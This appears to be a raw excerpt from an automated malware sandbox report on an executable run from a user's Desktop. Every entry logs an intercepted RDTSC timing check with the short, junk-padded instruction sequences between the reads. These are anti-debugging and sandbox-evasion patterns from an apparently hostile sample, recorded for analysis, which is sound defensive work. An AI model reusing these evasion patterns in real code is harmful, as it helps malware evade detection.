                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A625E second address: 6A6263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A63B8 second address: 6A63C2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A63C2 second address: 6A63C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A63C7 second address: 6A63EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5938558AA7h 0x00000009 jg 00007F5938558A96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A63EA second address: 6A6405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F593855EEF2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A6405 second address: 6A6409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A6409 second address: 6A640D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A6587 second address: 6A65A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 js 00007F5938558ABAh 0x0000000f jl 00007F5938558AA6h 0x00000015 jmp 00007F5938558A9Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A65A8 second address: 6A65B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6A65B0 second address: 6A65B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6ABEA0 second address: 6ABEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6ABEA4 second address: 6ABEBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6ABEBA second address: 6ABEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6AC025 second address: 6AC02F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5938558AAAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6AC02F second address: 6AC045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F593855EEEEh 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6AC301 second address: 6AC306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 657000 second address: 65704D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F593855EEE8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1E62h], ebx 0x0000002c mov ebx, dword ptr [ebp+124820AFh] 0x00000032 cmc 0x00000033 add eax, ebx 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jnl 00007F593855EEECh 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65704D second address: 657052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6AC4C6 second address: 6AC4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6AF511 second address: 6AF518 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B6BA3 second address: 6B6BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B6BA7 second address: 6B6BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B4D4A second address: 6B4D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B4D50 second address: 6B4D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B4D55 second address: 6B4D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F593855EEE6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B4EBF second address: 6B4EC9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5938558A9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B4EC9 second address: 6B4EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F593855EEF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B4EEA second address: 6B4EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B4EEE second address: 6B4EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B4EF4 second address: 6B4F13 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5938558AA9h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B51B5 second address: 6B51CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F593855EEEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B51CE second address: 6B51D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B51D2 second address: 6B51DE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F593855EEE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B5AC3 second address: 6B5AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5938558AA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B5AD9 second address: 6B5ADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B5D86 second address: 6B5D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B604B second address: 6B604F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B9F79 second address: 6B9F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B9F7F second address: 6B9F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B9F8A second address: 6B9FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA1h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B9FA1 second address: 6B9FAE instructions: 0x00000000 rdtsc 0x00000002 js 00007F593855EEE8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6B9FAE second address: 6B9FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6BA0F6 second address: 6BA0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6BA3FD second address: 6BA403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6BA403 second address: 6BA44A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F593855EEF6h 0x00000009 pushad 0x0000000a jg 00007F593855EEE6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jne 00007F593855EEE6h 0x00000018 jmp 00007F593855EEF4h 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push ecx 0x00000021 push esi 0x00000022 pop esi 0x00000023 pop ecx 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C737A second address: 6C7380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C7380 second address: 6C7384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C7384 second address: 6C738E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C738E second address: 6C7395 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C7395 second address: 6C739E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C5494 second address: 6C54C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEBh 0x00000007 ja 00007F593855EEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jmp 00007F593855EEF3h 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C54C1 second address: 6C54C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C5DBC second address: 6C5DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C63C5 second address: 6C63DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C63DA second address: 6C63E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F593855EEE6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C6A5D second address: 6C6A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007F5938558A9Ch 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C6A74 second address: 6C6A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F593855EEF1h 0x0000000b popad 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C6A92 second address: 6C6A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C6A98 second address: 6C6A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C6A9C second address: 6C6AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6C500F second address: 6C5015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6CE3FE second address: 6CE410 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5938558A9Ch 0x00000008 jo 00007F5938558A96h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6CE410 second address: 6CE414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6CE414 second address: 6CE428 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5938558A9Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6DC9C9 second address: 6DC9CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6DF051 second address: 6DF06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5938558A9Fh 0x0000000b js 00007F5938558A96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6DF06E second address: 6DF074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6E40DD second address: 6E40E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6F1F6A second address: 6F1F8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F593855EEF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6F8463 second address: 6F8482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5938558AA9h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6F8482 second address: 6F8486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7008F5 second address: 7008FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF25F second address: 6FF263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF263 second address: 6FF269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF3B7 second address: 6FF3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F593855EEE6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF50F second address: 6FF51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F5938558AA2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF51F second address: 6FF529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F593855EEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF945 second address: 6FF954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558A9Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF954 second address: 6FF987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F593855EEEFh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F593855EEF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF987 second address: 6FF9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5938558A96h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F5938558AA5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF9AA second address: 6FF9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6FF9AF second address: 6FF9CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA9h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7005E1 second address: 7005EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7005EE second address: 7005F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7005F2 second address: 7005F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7005F8 second address: 700617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5938558AA8h 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 703892 second address: 703896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 703896 second address: 70389E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7035CC second address: 7035D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7035D7 second address: 7035DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7035DD second address: 7035E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7035E1 second address: 7035E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 713062 second address: 713066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 713066 second address: 71306E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 71575D second address: 715763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7379D8 second address: 7379DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 7379DC second address: 7379E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 737DE9 second address: 737DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
